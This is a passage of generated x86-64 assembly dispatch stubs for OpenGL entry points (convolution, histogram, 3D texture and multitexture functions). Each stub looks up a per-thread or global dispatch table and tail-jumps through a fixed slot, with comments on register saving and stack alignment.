	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2848(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2848(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2848(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetConvolutionFilter), .-GL_PREFIX(GetConvolutionFilter)

	/* glGetConvolutionParameterfv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2856 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetConvolutionParameterfv)
	.type	GL_PREFIX(GetConvolutionParameterfv), @function
GL_PREFIX(GetConvolutionParameterfv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2856(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2856(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2856(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2856(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetConvolutionParameterfv), .-GL_PREFIX(GetConvolutionParameterfv)

	/* glGetConvolutionParameteriv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2864 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetConvolutionParameteriv)
	.type	GL_PREFIX(GetConvolutionParameteriv), @function
GL_PREFIX(GetConvolutionParameteriv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2864(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2864(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2864(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2864(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetConvolutionParameteriv), .-GL_PREFIX(GetConvolutionParameteriv)

	/* glGetSeparableFilter: 6 args in %rdi..%r9 (+%rbp pad); slot offset 2872 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetSeparableFilter)
	.type	GL_PREFIX(GetSeparableFilter), @function
GL_PREFIX(GetSeparableFilter):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2872(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2872(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2872(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2872(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetSeparableFilter), .-GL_PREFIX(GetSeparableFilter)

	/* glSeparableFilter2D: 8 args, 6 in %rdi..%r9 (+%rbp pad); slot offset 2880 */
	.p2align	4,,15
	.globl	GL_PREFIX(SeparableFilter2D)
	.type	GL_PREFIX(SeparableFilter2D), @function
GL_PREFIX(SeparableFilter2D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2880(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2880(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2880(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2880(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(SeparableFilter2D), .-GL_PREFIX(SeparableFilter2D)
	/*
	 * Generated GL dispatch stubs.  Each entry point below follows the
	 * same three-way pattern:
	 *   GLX_USE_TLS:  fetch the thread's dispatch table and tail-jump
	 *                 through the function's slot.
	 *   PTHREADS:     argument registers are live, so save them, call
	 *                 _x86_64_get_dispatch, restore, then tail-jump.
	 *   otherwise:    use _glapi_Dispatch if already set; else fall to
	 *                 label 1 and call _glapi_get_dispatch.
	 * Where an extra "pushq %rbp" appears it is only padding so that
	 * %rsp stays 16-byte aligned at the call (SysV AMD64 ABI).
	 */
	/* glGetHistogram: 5 args (%rdi..%r8); slot offset 2888 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetHistogram)
	.type	GL_PREFIX(GetHistogram), @function
GL_PREFIX(GetHistogram):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2888(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2888(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2888(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2888(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetHistogram), .-GL_PREFIX(GetHistogram)

	/* glGetHistogramParameterfv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2896 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetHistogramParameterfv)
	.type	GL_PREFIX(GetHistogramParameterfv), @function
GL_PREFIX(GetHistogramParameterfv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2896(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2896(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2896(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2896(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetHistogramParameterfv), .-GL_PREFIX(GetHistogramParameterfv)

	/* glGetHistogramParameteriv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2904 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetHistogramParameteriv)
	.type	GL_PREFIX(GetHistogramParameteriv), @function
GL_PREFIX(GetHistogramParameteriv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2904(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2904(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2904(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2904(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetHistogramParameteriv), .-GL_PREFIX(GetHistogramParameteriv)

	/* glGetMinmax: 5 args (%rdi..%r8); slot offset 2912 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetMinmax)
	.type	GL_PREFIX(GetMinmax), @function
GL_PREFIX(GetMinmax):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2912(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_x86_64_get_dispatch@PLT
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2912(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2912(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	call	_glapi_get_dispatch
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2912(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetMinmax), .-GL_PREFIX(GetMinmax)

	/* glGetMinmaxParameterfv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2920 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetMinmaxParameterfv)
	.type	GL_PREFIX(GetMinmaxParameterfv), @function
GL_PREFIX(GetMinmaxParameterfv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2920(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2920(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2920(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2920(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetMinmaxParameterfv), .-GL_PREFIX(GetMinmaxParameterfv)

	/* glGetMinmaxParameteriv: 3 integer args (%rdi, %rsi, %rdx); slot offset 2928 */
	.p2align	4,,15
	.globl	GL_PREFIX(GetMinmaxParameteriv)
	.type	GL_PREFIX(GetMinmaxParameteriv), @function
GL_PREFIX(GetMinmaxParameteriv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2928(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2928(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2928(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2928(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetMinmaxParameteriv), .-GL_PREFIX(GetMinmaxParameteriv)

	/* glHistogram: 4 args (%rdi..%rcx) + %rbp pad; slot offset 2936 */
	.p2align	4,,15
	.globl	GL_PREFIX(Histogram)
	.type	GL_PREFIX(Histogram), @function
GL_PREFIX(Histogram):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2936(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2936(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2936(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2936(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Histogram), .-GL_PREFIX(Histogram)

	/* glMinmax: 3 integer args (%rdi, %rsi, %rdx); slot offset 2944 */
	.p2align	4,,15
	.globl	GL_PREFIX(Minmax)
	.type	GL_PREFIX(Minmax), @function
GL_PREFIX(Minmax):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2944(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2944(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2944(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2944(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Minmax), .-GL_PREFIX(Minmax)
.p2align 4,,15
.globl GL_PREFIX(ResetHistogram)
.type GL_PREFIX(ResetHistogram), @function
GL_PREFIX(ResetHistogram):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2952(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2952(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2952(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2952(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ResetHistogram), .-GL_PREFIX(ResetHistogram)
.p2align 4,,15
.globl GL_PREFIX(ResetMinmax)
.type GL_PREFIX(ResetMinmax), @function
GL_PREFIX(ResetMinmax):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2960(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 2960(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2960(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 2960(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ResetMinmax), .-GL_PREFIX(ResetMinmax)
.p2align 4,,15
.globl GL_PREFIX(TexImage3D)
.type GL_PREFIX(TexImage3D), @function
GL_PREFIX(TexImage3D):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2968(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2968(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2968(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 2968(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexImage3D), .-GL_PREFIX(TexImage3D)
	.p2align	4,,15
	.globl GL_PREFIX(TexSubImage3D)
	.type GL_PREFIX(TexSubImage3D), @function
/* glTexSubImage3D: tail-jump through the dispatch-table slot at byte
 * offset 2976.  All six integer argument registers (%rdi-%r9) are
 * saved around the lookup call; %rbp is pushed only so %rsp stays
 * 16-byte aligned at the call. */
GL_PREFIX(TexSubImage3D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2976(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2976(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2976(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2976(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(TexSubImage3D), .-GL_PREFIX(TexSubImage3D)
	.p2align	4,,15
	.globl GL_PREFIX(CopyTexSubImage3D)
	.type GL_PREFIX(CopyTexSubImage3D), @function
/* glCopyTexSubImage3D: tail-jump through the dispatch-table slot at
 * byte offset 2984.  All six integer argument registers (%rdi-%r9)
 * are saved around the lookup call; %rbp is pushed only for 16-byte
 * %rsp alignment. */
GL_PREFIX(CopyTexSubImage3D):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2984(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2984(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2984(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%r8
	pushq	%r9
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%r9
	popq	%r8
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2984(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(CopyTexSubImage3D), .-GL_PREFIX(CopyTexSubImage3D)
	.p2align	4,,15
	.globl GL_PREFIX(ActiveTextureARB)
	.type GL_PREFIX(ActiveTextureARB), @function
/* glActiveTextureARB: tail-jump through the dispatch-table slot at
 * byte offset 2992; the lone argument in %rdi is saved around the
 * lookup call. */
GL_PREFIX(ActiveTextureARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2992(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2992(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	2992(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2992(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ActiveTextureARB), .-GL_PREFIX(ActiveTextureARB)
	.p2align	4,,15
	.globl GL_PREFIX(ClientActiveTextureARB)
	.type GL_PREFIX(ClientActiveTextureARB), @function
/* glClientActiveTextureARB: tail-jump through the dispatch-table slot
 * at byte offset 3000; the lone argument in %rdi is saved around the
 * lookup call. */
GL_PREFIX(ClientActiveTextureARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3000(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	3000(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3000(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	3000(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ClientActiveTextureARB), .-GL_PREFIX(ClientActiveTextureARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord1dARB)
	.type GL_PREFIX(MultiTexCoord1dARB), @function
/* glMultiTexCoord1dARB: tail-jump through the dispatch-table slot at
 * byte offset 3008.  %rdi and the FP argument in %xmm0 are spilled to
 * a 24-byte scratch frame (size keeps %rsp 16-byte aligned) around
 * the lookup call, since %xmm0 cannot be pushed directly. */
GL_PREFIX(MultiTexCoord1dARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3008(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3008(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3008(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3008(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord1dARB), .-GL_PREFIX(MultiTexCoord1dARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord1dvARB)
	.type GL_PREFIX(MultiTexCoord1dvARB), @function
/* glMultiTexCoord1dvARB: tail-jump through the dispatch-table slot at
 * byte offset 3016.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push (callee-saved, harmless) keeps %rsp 16-byte
 * aligned. */
GL_PREFIX(MultiTexCoord1dvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3016(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3016(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3016(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3016(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord1dvARB), .-GL_PREFIX(MultiTexCoord1dvARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord1fARB)
	.type GL_PREFIX(MultiTexCoord1fARB), @function
/* glMultiTexCoord1fARB: tail-jump through the dispatch-table slot at
 * byte offset 3024.  %rdi and the FP argument in %xmm0 are spilled to
 * a 24-byte scratch frame (keeps %rsp 16-byte aligned) around the
 * lookup call. */
GL_PREFIX(MultiTexCoord1fARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3024(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3024(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3024(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%rdi, (%rsp)
	movq	%xmm0, 8(%rsp)
	call	_glapi_get_dispatch
	movq	8(%rsp), %xmm0
	movq	(%rsp), %rdi
	addq	$24, %rsp
	movq	3024(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord1fARB), .-GL_PREFIX(MultiTexCoord1fARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord1fvARB)
	.type GL_PREFIX(MultiTexCoord1fvARB), @function
/* glMultiTexCoord1fvARB: tail-jump through the dispatch-table slot at
 * byte offset 3032.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord1fvARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3032(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3032(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3032(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3032(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord1fvARB), .-GL_PREFIX(MultiTexCoord1fvARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord1iARB)
	.type GL_PREFIX(MultiTexCoord1iARB), @function
/* glMultiTexCoord1iARB: tail-jump through the dispatch-table slot at
 * byte offset 3040.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord1iARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3040(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3040(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3040(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3040(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultiTexCoord1iARB), .-GL_PREFIX(MultiTexCoord1iARB)
	.p2align	4,,15
	.globl GL_PREFIX(MultiTexCoord1ivARB)
	.type GL_PREFIX(MultiTexCoord1ivARB), @function
/* glMultiTexCoord1ivARB: tail-jump through the dispatch-table slot at
 * byte offset 3048.  %rdi/%rsi are saved around the lookup call; the
 * extra %rbp push keeps %rsp 16-byte aligned. */
GL_PREFIX(MultiTexCoord1ivARB):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	3048(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rsi
	popq	%rdi
	movq	3048(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f
	movq	3048(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
